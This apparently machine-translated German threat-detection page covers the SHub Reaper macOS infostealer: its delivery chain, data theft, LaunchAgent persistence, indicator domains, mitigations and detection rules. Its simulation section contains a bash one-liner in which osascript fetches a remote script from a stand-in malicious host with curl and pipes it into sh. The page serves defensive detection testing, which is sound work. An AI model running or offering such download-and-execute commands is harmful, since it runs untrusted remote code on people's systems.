SHub Reaper | macOS Stealer täuscht Apple, Google und Microsoft in einer einzigen Angriffskette
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht analysiert eine neue macOS-Infostealer-Variante namens SHub Reaper, die gefälschte WeChat- und Miro-Installer verwendet, um eine bösartige AppleScript-Nutzlast über eine typovergleichene, Microsoft-ähnliche Domain bereitzustellen. Nach dem Start im Skripteditor sammelt die Nutzlast Browserdaten, Kryptowährungs-Wallet-Dateien und Schlüsselbundinformationen und exfiltriert dann die gestohlenen Inhalte als geteilte ZIP-Archive. Die Malware manipuliert auch Wallet-Dateien und etabliert Persistenz über einen LaunchAgent, der als Google-Software-Update getarnt ist. Empfohlene Erkennung konzentriert sich auf AppleScript-Ausführung, verdächtige LaunchAgent-Erstellung und ausgehenden Datenverkehr zur bekannten Command-and-Control-Infrastruktur.
Untersuchung
SentinelOne verfolgte die komplette mehrstufige Lieferkette einschließlich Missbrauch des applescript:// -Schemas, dynamische Generierung der AppleScript-Nutzlast und eines Dateierfassungsmoduls, das das Dokumentendiebstahlverhalten, das in AMOS zu sehen ist, spiegelt. Forscher fingen den Netzwerkverkehr zur Command-and-Control-Domain hebsbsbzjsjshduxbs.xyz und zugehörigen Endpunkten ab, zusammen mit der Erstellung temporärer Dateien unter /tmp und eines LaunchAgents, der im Benutzerverzeichnis der Bibliothek platziert wurde. Die Untersuchung entdeckte zudem fest codierte Telegram-Bot-Funktionalität, die für die Betreiber-Telemetrie verwendet wird.
Minderung
Verteidiger sollten den Zugriff auf die typoverschwundenen Domains blockieren mlcrosoft.co.com, qq-0732gwh22.com, und mlroweb.com, und die Erstellung von LaunchAgents überwachen, die Pfade imitieren, die Google-Update-Komponenten nachahmen. Anwendungserlaubnislisten sollten verwendet werden, um die AppleScript-Ausführung aus nicht vertrauenswürdigen Quellen zu beschränken, und strenge Codesignaturverifikation sollte erzwungen werden. Netzwerkerkennungen sollten auch auf Kommunikation mit der identifizierten Command-and-Control-Domain und deren bekannten API-Pfaden aufmerksam machen.
Reaktion
Sollte SHub Reaper Aktivität entdeckt werden, isolieren Sie den betroffenen Endpunkt umgehend, beenden Sie alle verdächtigen AppleScript- oder LaunchAgent-Prozesse und entfernen Sie die bösartigen Dateien aus /tmp und der Benutzerbibliothek. Ermittler sollten dann eine vollständige forensische Sammlung von Browserdatenspeichern, Wallet-Verzeichnissen und Anmeldeinformationen durchführen, gefolgt von Anmeldeinformations-Rücksetzungen, wo ein Kompromiss vermutet wird. Die identifizierte Command-and-Control-Infrastruktur sollte blockiert werden, und das Incident-Response-Team sollte mit einer umfassenderen Bedrohungsjagd in der gesamten Umgebung beginnen.
Angriffsfluss
Erkennungen
Mögliche IP-Lookup-Domain-Kommunikationsversuche (via DNS)
Ansehen
Erzwungene Codesignatur eines modifizierten Anwendungsbündels (via cmdline)
Ansehen
MacOS-Archivtool zeigt auf verdächtiges Verzeichnis (via cmdline)
Ansehen
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Ansehen
Archiv wurde im temporären MacOS-Ordner erstellt (via file_event)
Ansehen
Mögliche Base64-kodierte Zeichenfolgenmanipulation (via cmdline)
Ansehen
IOCs (HashSha256) zur Erkennung: SHub Reaper | macOS Stealer täuscht Apple, Google und Microsoft in einer einzigen Angriffskette vor
Ansehen
IOCs (HashMd5) zur Erkennung: SHub Reaper | macOS Stealer täuscht Apple, Google und Microsoft in einer einzigen Angriffskette vor
Ansehen
Erkennung der SHub Reaper-Infektionskette unter Verwendung von Typovergleichenden und C2-Domains [Webserver]
Ansehen
Erkennung der SHub Reaper-Malware-Ausführung über AppleScript und Curl [Linux-Prozess-Erstellung]
Ansehen
Simulationsausführung
Voraussetzung: Die Telemetrie & Baseline-Vorflugprüfung muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und dazu dienen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angreifernarrativ & Befehle:
Der Angreifer erstellt einen prägnanten Einzeiler, derosascriptnutzt, um einen Shell-Befehl auszuführen. Innerhalb des AppleScripts,do shell scriptführtcurlaus, um ein Remote-Shell-Skript (payload.sh) herunterzuladen und direkt inshzur Ausführung zu leiten. Da die gesamte Kette in einem einzigen AppleScript-Aufruf eingebettet ist, protokolliert macOS ein einzelnesProzesserstellungEreignis, dessen Befehlszeile sowohl enthältosascriptandcurl, was die Erkennungsregel erfüllt. -
Regressionstestskript:
#!/bin/bash # # Simuliert die Ausführung von SHub Reaper auf macOS # Generiert ein einzelnes Prozesserstellungs-Ereignis, das sowohl 'osascript' als auch 'curl' enthält # MALICIOUS_URL="https://malicious.example.com/payload.sh" # Einzeiler: osascript führt einen Shell-Befehl aus, der die Nutzlast holt und ausführt osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Bereinigungskommandos:
#!/bin/bash # # Bereinigen Sie alle von der Simulation erstellten Artefakte. # Die Nutzlast läuft im Speicher und schreibt keine Dateien, aber wir stellen sicher, dass keine verbleibenden Prozesse bleiben. # # Töten Sie alle Streu-'sh'-Prozesse, die durch den Test gestartet wurden (mit Vorsicht auf Produktionssystemen verwenden) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"